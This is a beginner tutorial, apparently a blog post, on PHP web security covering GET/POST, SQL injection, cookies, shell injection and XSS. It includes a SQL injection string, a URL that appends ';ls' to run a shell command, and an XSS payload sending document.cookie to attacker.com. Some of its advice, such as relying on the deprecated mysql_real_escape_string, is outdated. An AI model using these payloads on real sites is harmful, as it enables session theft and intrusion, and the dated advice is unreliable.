Know something about PHP Securities

php

So you are a PHP developer, you can create some good PHP application. Most of web server are friendly with PHP. That’s why most people choose it as their Web Development language. But you know many of hackers are able to hack your code and execute it on browser.

In this article we try to understand some PHP code which it my help to protect your site.

GET vs POST

In PHP you can take user data using GET or POST method. But make sure that GET method is visible in address bar. That’s means all variable names and values are displayed in the URL. POST method is passed to the current script via the HTTP. But in GET method you can make bookmark for page which POST doesn’t. It’s not a good idea to use GET method for sending passwords or other sensitive information.

Code Injection

It’s a technique to get information, Hacking System, Cracking System. Injection flaws occur when an application sends untrusted data to an interpreter. They are often found in SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing.

An Injection Attack could have this command line:

String query = “SELECT * FROM accounts WHERE custID='” + request.getParameter(“id”) 
+”‘”;

The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker.

You can avoid injecting by taking some steps :

1. Don’t write too wrong code. Utilize your PHP code.
2. Use API properly secure all input characters.
3. Input validation ( such as put number, character or password in specific input field ).
4. using special function like : htmlspecialchars(), strip_tags(), mysql_real_escape_string().

There are more action you can take to protect Code injection.

Session Issue

PHP accept session ID. We have seen some website warn for accept cookies policy. It’s used for identify user. Every time you delete cookies from browser it will take a little time to load. But if the cookies stay ion browser the page load faster. So if session ID stored in cookies hackers can steal information through XSS and JavaScript. Note that Most modern browsers support HTTP-only cookies. These cookies are only accessible via HTTP(s) requests and not JavaScript, so XSS snippets can not access them.

You can delete cookies by following snippet :

setcookie ($name, "", 1);
setcookie ($name, false);
unset($_COOKIE[$name]);

Shell Injection

Shell injection or Command injection is injection of Operating System which execute through a web application. A custom script is needed to  display file contents to users. Look at the example it will makes clear concept of shell Injection :

A user comes to the page with the following url:

www.xxxxxxx.com/viewcontent.php?filename=my_project.txt

PHP page shows user the content fine. You may have guessed, the code is not secure and is vulnerable to a shell command injection attack. If an attacker comes, they may append a semicolon (;) and another Unix command to the filename specified in the URL parameter. Perhaps they want to start by listing what files are in the directory:

www.xxxxxxx.com/viewcontent.php?filename=my_project.txt;ls

The page still comes up with the file contents, but when you injected a command (ls), it doesn’t end there. The command line continues to execute the following command and shows some special information:

example file list when apply (ls) injection

my_project.txt
viewcontent.php
icon.png

Avoid passing user given arguments to OS programs or strip out potentially damaging characters such as semicolons, other separators which can be used to run additional commands can take down shell injection.

Cross Site Scripting Attacks

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.

Note that – the user might see a popup window asking for confirmation when a page contains XSS script in it.

Look at the at those code :

(String) page += “<input name=’creditcard’ type=’TEXT’ value='” +
request.getParameter(“CC”) + “‘>”;

The attacker modifies the ‘CC’ parameter in their browser to:

‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?
foo=’+document.cookie</script>’

This causes the user’s session ID to be sent to the attacker’s website, That means the hacker has access to the website admin credentials and can take complete control over it.